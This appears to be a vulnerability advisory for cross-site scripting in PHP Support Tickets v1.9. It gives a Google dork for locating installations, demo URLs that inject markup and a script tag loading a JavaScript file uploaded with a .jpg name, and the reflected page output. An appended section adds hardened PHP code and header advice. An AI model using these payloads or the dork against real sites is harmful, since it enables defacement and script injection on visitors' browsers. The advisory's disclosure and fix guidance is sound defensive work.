PHP Support Tickets version 1.9 suffers from a cross-site scripting vulnerability.
Google dork:
"PHP Support Tickets v1.9" inurl:index.php?action=
"PHP Support Tickets v1.9" by "Triangle Solutions Ltd" allows an XSS attack at
index.php, and some implementations also have poor validation of uploaded
files, allowing a JS file to be uploaded with a jpg extension, which could be
used to bypass browser XSS filters.
Demo 1 (XSS):
url:
http://server.com/app_folder/index.php?action=Register<marquee><h1>Sys_A501%20@%20Raza-Mexicana.org</h1></marquee>
Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->
<table width="75%" cellspacing="1" cellpadding="1" class="boxborder" align="center">
<tr>
<td class="boxborder text" bgcolor="#AABBDD">Register<marquee><h1>Sys_A501 @ Raza-Mexicana.org</h1></marquee></td>
Demo 2 (JS as JPEG):
url:
http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/1671.jpg%3E%3C/script%3E
Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->
<table width="75%" cellspacing="1" cellpadding="1" class="boxborder" align="center">
<tr>
<td class="boxborder text" bgcolor="#AABBDD">Login<script src=./upload/1671.jpg></script></td>
Sys_A501
sys_a501@raza-mexicana.org
sys.a501@gmail.com
www.raza-mexicana.org
http://inrootwetrust.org.mx/
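
A hardened form of the two flaws described above (the action parameter reflected into the title cell, and uploads accepted on extension alone), as an added example that is not PHP Support Tickets source code. The function names, the action allowlist and the default action are assumptions, and the fileinfo extension is assumed to be enabled.

```php
<?php
// Added example: hypothetical handler code, not PHP Support Tickets source.

// Assumption: the valid actions. Only Register and Login appear in the advisory.
const ALLOWED_ACTIONS = ['Register', 'Login'];

/** Return the action only if it is on the allowlist, else a fixed default. */
function safe_action(string $raw): string
{
    return in_array($raw, ALLOWED_ACTIONS, true) ? $raw : 'Login';
}

/** Render the title cell; output encoding is applied even to allowlisted values. */
function render_title_cell(string $raw): string
{
    $title = htmlspecialchars(safe_action($raw), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td class="boxborder text" bgcolor="#AABBDD">' . $title . '</td>';
}

/** Accept an upload only if its content, not its name, identifies an allowed image. */
function is_real_image(string $path): bool
{
    $allowed = ['image/jpeg', 'image/png', 'image/gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    // getimagesize() must also parse the header; a script renamed to .jpg fails both checks.
    return in_array($mime, $allowed, true) && @getimagesize($path) !== false;
}

// Constructed inputs mirroring the two demo requests in the advisory.
echo render_title_cell('Register<marquee><h1>x</h1></marquee>'), "\n";
echo render_title_cell('Login<script src=./upload/1671.jpg></script>'), "\n";

// Constructed upload: script text stored under an image-style temporary name.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "alert(1);\n");
var_dump(is_real_image($tmp));
unlink($tmp);
```

Serving the upload directory with a correct image Content-Type and `X-Content-Type-Options: nosniff` adds a second layer, since browsers then refuse to execute a non-script MIME type referenced from a script tag.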